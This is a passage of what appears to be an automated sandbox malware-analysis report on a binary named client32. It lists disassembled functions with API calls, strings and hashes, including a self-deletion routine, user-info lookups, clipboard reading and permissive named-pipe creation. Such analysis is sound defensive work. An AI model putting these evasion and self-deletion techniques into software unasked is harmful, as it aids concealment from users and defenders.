                                                                                  • Instruction Fuzzy Hash: 5422C7B5A00719AFE714CFA4CC85FEAF7B8FB48708F0045A9E26A97684D774A940CF50
                                                                                  Function 111273E0 Relevance: 68.5, APIs: 31, Strings: 8, Instructions: 289fileprocessthreadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 11127400
                                                                                  • _memset.LIBCMT ref: 1112741D
                                                                                  • GetVersionExA.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 11127436
                                                                                  • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,00000000,00000000), ref: 11127455
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112749B
                                                                                  • _strrchr.LIBCMT ref: 111274AA
                                                                                  • CreateFileA.KERNEL32(?,C0000000,00000005,00000000,00000002,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 111274E3
                                                                                  • WriteFile.KERNEL32(00000000,111B8C68,000004D0,?,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 1112750F
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000), ref: 1112751C
                                                                                  • CreateFileA.KERNEL32(?,80000000,00000005,00000000,00000003,04000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 11127537
                                                                                  • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,00000000,00000000), ref: 11127547
                                                                                  • wsprintfA.USER32 ref: 11127561
                                                                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 1112758D
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 1112759E
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 111275A7
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 111275AA
                                                                                  • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000044,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 111275E0
                                                                                  • GetCurrentProcess.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 11127682
                                                                                  • GetCurrentProcess.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11127685
                                                                                  • DuplicateHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11127688
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112769C
                                                                                  • _strrchr.LIBCMT ref: 111276AB
                                                                                  • _memmove.LIBCMT ref: 11127724
                                                                                  • GetThreadContext.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 11127744
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileHandleProcess$CloseCreate$Current$ModuleName_memset_strrchr$ContextDuplicatePathTempThreadVersionWrite_memmovewsprintf
                                                                                  • String ID: "%s" %d %s$*.*$D$NSelfDel.exe$explorer.exe$iCodeSize <= sizeof(local.opCodes)$pSlash$selfdelete.cpp
                                                                                  • API String ID: 2219718054-800295887
                                                                                  • Opcode ID: 358ec25b12d5316939eb5b1f22c615080bb201b40904b81bfc467a07c38be4f0
                                                                                  • Instruction ID: 6f5bf149a73cded94bd2a3d0400a9449b47971ff92e0dc1769d6f3c3ef99b26f
                                                                                  • Opcode Fuzzy Hash: 358ec25b12d5316939eb5b1f22c615080bb201b40904b81bfc467a07c38be4f0
                                                                                  • Instruction Fuzzy Hash: D8B1D4B5A40328AFE724DF60CD85FDAF7B8EB44708F008199E619A76C4DB706A84CF55
                                                                                  Function 11147160 Relevance: 31.7, APIs: 8, Strings: 10, Instructions: 220libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(netapi32.dll,?,?), ref: 11147195
                                                                                  • GetProcAddress.KERNEL32(00000000,NetWkstaUserGetInfo), ref: 111471C6
                                                                                  • GetProcAddress.KERNEL32(00000000,NetUserGetInfo), ref: 111471D4
                                                                                  • GetProcAddress.KERNEL32(00000000,NetApiBufferFree), ref: 111471E2
                                                                                  • GetUserNameW.ADVAPI32(?,?), ref: 11147233
                                                                                  • GetTickCount.KERNEL32 ref: 111472A0
                                                                                  • GetTickCount.KERNEL32 ref: 111472C3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$CountTick$LibraryLoadNameUser
                                                                                  • String ID: <not Available>$AccessDenied$InvalidComputer$NetApiBufferFree$NetUserGetInfo$NetUserGetInfo(%ls\%ls) took %d ms and ret x%x$NetWkstaUserGetInfo$UserNotFound$d$netapi32.dll
                                                                                  • API String ID: 132346978-2450594007
                                                                                  • Opcode ID: d766d68a65dbef05b4443dd6d9e807eb58abfdc436fa79d712fe2cbede22872e
                                                                                  • Instruction ID: 7595ca438a49fe2cfed1e9b9138c1f844f941fc746b3e2b3d1353ee5cc6e5023
                                                                                  • Opcode Fuzzy Hash: d766d68a65dbef05b4443dd6d9e807eb58abfdc436fa79d712fe2cbede22872e
                                                                                  • Instruction Fuzzy Hash: 3F917A75A012289FDB28CF64C894ADAFBB4EF49318F5581E9E94D97301DB309E80CF91
                                                                                  Function 111236E0 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 329windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsIconic.USER32(?), ref: 11123836
                                                                                  • FreeLibrary.KERNEL32(?,?,?), ref: 1112387B
                                                                                  • IsIconic.USER32(?), ref: 111238C4
                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 11123931
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Iconic$FreeInvalidateLibraryRect
                                                                                  • String ID: KeepAspect$ScaleToFit$View$ignoring WM_TOUCH
                                                                                  • API String ID: 2857465220-3401310001
                                                                                  • Opcode ID: f2e6e33feaa6725b9faac7f171b1172a329f252e15d45d58948213b881d2ca94
                                                                                  • Instruction ID: 49527fdfa53e08aa09f3a132f4721a51d3eab46a8aa9ea1429b3fa51c4cb3807
                                                                                  • Opcode Fuzzy Hash: f2e6e33feaa6725b9faac7f171b1172a329f252e15d45d58948213b881d2ca94
                                                                                  • Instruction Fuzzy Hash: 30C12771E1870A9FEB15CF64CA81BEAF7A4FB4C714FA0052EE916872C0E775A841CB51
                                                                                  Function 110CB750 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 168windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 110CB7D9
                                                                                  • IsIconic.USER32(00000001), ref: 110CB7E9
                                                                                  • GetClientRect.USER32(00000001,?), ref: 110CB7F8
                                                                                  • GetSystemMetrics.USER32(00000000), ref: 110CB80D
                                                                                  • GetSystemMetrics.USER32(00000001), ref: 110CB814
                                                                                  • IsIconic.USER32(00000001), ref: 110CB844
                                                                                  • GetWindowRect.USER32(00000001,?), ref: 110CB853
                                                                                  • SetWindowPos.USER32(?,00000000,?,11186ABB,00000000,00000000,0000001D,00000000,?,00000001,?,00000002,?,?), ref: 110CB907
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: RectWindow$IconicMetricsSystem$ClientErrorExitLastMessageProcesswsprintf
                                                                                  • String ID: ..\ctl32\nsmdlg.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
                                                                                  • API String ID: 2655531791-1552842965
                                                                                  • Opcode ID: 7316ed0ab011e425627eb5277c7b03534fcc1c44e65c4e20bf12da702932a4de
                                                                                  • Instruction ID: bec57f5bcccff08dda3657368f880f3a53371a65c549dad109d34ac0d6980115
                                                                                  • Opcode Fuzzy Hash: 7316ed0ab011e425627eb5277c7b03534fcc1c44e65c4e20bf12da702932a4de
                                                                                  • Instruction Fuzzy Hash: 3B51BE71E0061AAFDB10CFA5CC84FEEB7B8FB48754F1441A9E516A7280E774A905CF90
                                                                                  Function 110F37A0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 79pipesleepmemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LocalAlloc.KERNEL32(00000040,00000014,?,00000000), ref: 110F37AC
                                                                                  • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 110F37D5
                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 110F37E2
                                                                                  • CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,?,?,000003E8,?), ref: 110F3813
                                                                                  • GetLastError.KERNEL32 ref: 110F3820
                                                                                  • Sleep.KERNEL32(000003E8), ref: 110F383F
                                                                                  • CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,00000001,?,000003E8,0000000C), ref: 110F385E
                                                                                  • LocalFree.KERNEL32(?), ref: 110F386F
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  • CreateNamedPipe %s failed, error %d, xrefs: 110F3828
                                                                                  • pSD, xrefs: 110F37C5
                                                                                  • e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp, xrefs: 110F37C0
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateDescriptorErrorLastLocalNamedPipeSecurity$AllocDaclExitFreeInitializeMessageProcessSleepwsprintf
                                                                                  • String ID: CreateNamedPipe %s failed, error %d$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$pSD
                                                                                  • API String ID: 3134831419-838605531
                                                                                  • Opcode ID: ba8c9a88e56743c1b68755e398c1e881422c14d751ccacaf3068d1f003b9bfe3
                                                                                  • Instruction ID: 0e8d2fcc7f1c5a3ddbef900f79df2a7d8f3873558929e31ad043a2fe9730b339
                                                                                  • Opcode Fuzzy Hash: ba8c9a88e56743c1b68755e398c1e881422c14d751ccacaf3068d1f003b9bfe3
                                                                                  • Instruction Fuzzy Hash: D721AA71E80329BBE7119BA4CC8AFEEB76CDB44729F004211FE356B1C0D6B05A058795
                                                                                  Function 110336D0 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 312COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: CheckClip Error: Can't open clip, e=%d$Client$DisableClipBoard$Sendclip Error: Cant open clip$openclip Error: Cant open clip
                                                                                  • API String ID: 0-293745777
                                                                                  • Opcode ID: d6ddac33ee9b6d6072fce80ab62b67592f5839c241fe45a64ce58f0e7e606b81
                                                                                  • Instruction ID: 04be3a73864f79ea4ff0060164bd048450722a5e4ebb998c6abac99bf16b3135
                                                                                  • Opcode Fuzzy Hash: d6ddac33ee9b6d6072fce80ab62b67592f5839c241fe45a64ce58f0e7e606b81
                                                                                  • Instruction Fuzzy Hash: FFA1B43AF142059FD714DB65DC91FAAF3A4EF98305F104199EA8A9B380DB71B901CB91
                                                                                  Function 110934A0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(11148360), ref: 110934A9
                                                                                    • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                    • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                    • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                  • OpenEventA.KERNEL32(001F0003,00000000,NSMFindClassEvent), ref: 110934D9
                                                                                  • FindWindowA.USER32(NSMClassList,00000000), ref: 110934EA
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 110934F1
                                                                                    • Part of subcall function 11091920: GlobalAddAtomA.KERNEL32(NSMClassList), ref: 11091982
                                                                                    • Part of subcall function 11093410: GetClassInfoA.USER32(1109350C,NSMClassList,?), ref: 11093424
                                                                                    • Part of subcall function 11091A50: CreateWindowExA.USER32(00000000,NSMClassList,00000000,00000000), ref: 11091A9D
                                                                                    • Part of subcall function 11091A50: UpdateWindow.USER32(?), ref: 11091AEF
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000001,NSMFindClassEvent,?,00000000,?,00000000), ref: 11093531
                                                                                    • Part of subcall function 11091B00: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11091B1A
                                                                                    • Part of subcall function 11091B00: TranslateAcceleratorA.USER32(?,?,?,?,?,?,11093540,?,00000000,?,00000000), ref: 11091B47
                                                                                    • Part of subcall function 11091B00: TranslateMessage.USER32(?), ref: 11091B51
                                                                                    • Part of subcall function 11091B00: DispatchMessageA.USER32(?), ref: 11091B5B
                                                                                    • Part of subcall function 11091B00: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11091B6B
                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 11093555
                                                                                    • Part of subcall function 110919C0: GlobalDeleteAtom.KERNEL32(00000000), ref: 110919FE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessageWindow$AtomCreateEventGlobalTranslate$AcceleratorClassCloseDeleteDispatchExceptionFilterFindForegroundHandleInfoOpenUnhandledUpdate_malloc_memsetwsprintf
                                                                                  • String ID: NSMClassList$NSMFindClassEvent
                                                                                  • API String ID: 1622498684-2883797795
                                                                                  • Opcode ID: 29ecc446f54fe485b0921c68df6d4683565cdf60394698646c335648b9e5d1e1
                                                                                  • Instruction ID: 4b33314c0ec69eaaabe86fb2bb0f057967e6cef17922574bfca5772aa51aa607
                                                                                  • Opcode Fuzzy Hash: 29ecc446f54fe485b0921c68df6d4683565cdf60394698646c335648b9e5d1e1
                                                                                  • Instruction Fuzzy Hash: E911C639F4822D67EB15A3F51D29B9FBA985B44BA8F010024F92DDA580EF64F400E6A5
                                                                                  Function 11033320 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 87clipboardCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsClipboardFormatAvailable.USER32(?), ref: 11033361
                                                                                  • GetClipboardData.USER32(?), ref: 1103337D
                                                                                  • GetClipboardFormatNameA.USER32(?,?,00000050), ref: 110333FC
                                                                                  • GetLastError.KERNEL32 ref: 11033406
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 11033426
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Clipboard$Format$AvailableDataErrorGlobalLastNameUnlock
                                                                                  • String ID: ..\ctl32\clipbrd.cpp$pData && pSize
                                                                                  • API String ID: 1861668072-1296821031
                                                                                  • Opcode ID: f2492e8139006f9da97ffff361a7bd75bee4125508335d11334c914ee87c47b7
                                                                                  • Instruction ID: bd08247f7f5b97daa22515b1f99226a4dce8a406111026209efe1a9e37a97f87
                                                                                  • Opcode Fuzzy Hash: f2492e8139006f9da97ffff361a7bd75bee4125508335d11334c914ee87c47b7
                                                                                  • Instruction Fuzzy Hash: 8121D336E1415D9FC701DFE998C1AAEF3B8EF8961AB0040A9E815DF300EF71A900CB90
                                                                                  Function 11089430 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindResourceA.KERNEL32(00000000,00001770,0000000A), ref: 1108946F
                                                                                  • LoadResource.KERNEL32(00000000,00000000,?,00000000,?,110CF1A6,?), ref: 11089484
                                                                                  • LockResource.KERNEL32(00000000,?,00000000,?,110CF1A6,?), ref: 110894B6
                                                                                  Strings
